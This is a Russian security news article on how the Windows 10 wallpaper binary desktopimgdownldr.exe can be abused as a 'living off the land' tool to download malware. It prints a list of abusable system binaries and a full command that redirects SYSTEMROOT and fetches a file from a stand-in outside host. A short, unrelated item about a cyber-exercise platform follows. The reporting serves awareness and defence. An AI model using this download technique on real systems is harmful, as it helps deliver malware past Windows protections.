Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Механизм установки фона в Windows 10 позволяет загрузить вредонос

Исполняемые системные файлы Windows 10, отвечающие за установку фона рабочего стола и экрана блокировки, могут посодействовать злоумышленникам — с их помощью атакующий может загрузить на компьютер вредоносную программу в обход средств защиты.

Эти файлы известны под именем LoLBins (living-of-the-land binaries), они идут в комплекте с каждой версией ОС и служат вполне определённым безобидным целям. Однако киберпреступники могут использовать LoLBins на заключительном этапе своей атаки, чтобы скрыть вредоносную активность в системе.

Например, условный атакующий может задействовать LoLBins для загрузки и установки вредоносной программы, которая успешно обойдёт защитные механизмы Windows — контроль учётных записей пользователей (UAC) и политики WDAC.

В прошлом году эксперты Cisco Talos опубликовали список из 13 системных исполняемых файлов Windows, которые могут в теории загрузить и выполнить вредоносный код:

  • powershell.exe
  • bitsadmin.exe
  • certutil.exe
  • psexec.exe
  • wmic.exe
  • mshta.exe
  • mofcomp.exe
  • cmstp.exe
  • windbg.exe
  • cdb.exe
  • msbuild.exe
  • csc.exe
  • regsvr32.exe

Теперь к изучению проблемы подключились исследователи из SentinelOne. Они обнаружили, что desktopimgdownldr.exe (располагается в системной директории system32) также может послужить в качестве LoLBin.

Задача файла desktopimgdownldr.exe в Windows проста — устанавливать фон рабочего стола или экрана блокировки. По сути, это компонент всего механизма, отвечающего за персонализацию ОС.

Настройки функции установки фона рабочего стола допускают файлы в форматах JPG, JPEG, PNG. Как правило, файл desktopimgdownldr.exe работает с привилегиями администратора, однако команда SentinelOne выяснила, что этот компонент можно запустить с правами обычного пользователя для загрузки файлов из внешнего источника.

Если злоумышленник поменяет переменную среды %systemroot%, он сможет изменить директорию для загрузки произвольного файла и обойти средства защиты операционной системы:

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

В арсенал Solar CyberMir добавили форматы квиза, квеста, Jeopardy

Группа компаний «Солар» анонсировала выпуск CyberMir версии 7.0. Платформа для киберучений теперь работает на движке Solar Quest, позволяющем проводить квизы, квесты, командно-штабные тренинги и соревнования Jeopardy.

Привнесение в учения логики приключенческих компьютерных игр, по мнению вендора, увеличивает вариативность сценариев и повышает точность оценки действий испытуемых.

Курс развития CyberMir на геймификацию киберучений в «Солар» считают долгосрочным трендом, способным сократить время и расходы на организацию проверок практических навыков специалистов Blue Team.

«На новом этапе развития платформы мы поддержали запрос рынка на форматы непрерывного обучения, которые повышают вовлеченность и экономят рабочее время сотрудников», — заявил Сергей Кулаков, технический директор департамента «Киберполигон» ГК «Солар».

Функциональность SolarQuest будет расширяться. Запланированы интеграция движка с ВМ и цифровыми двойниками реальных инфраструктур, внедрение командного режима реализации сценариев, с поэтапной передачей заданий участникам в соответствии с их ролями и на основании принятых решений.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru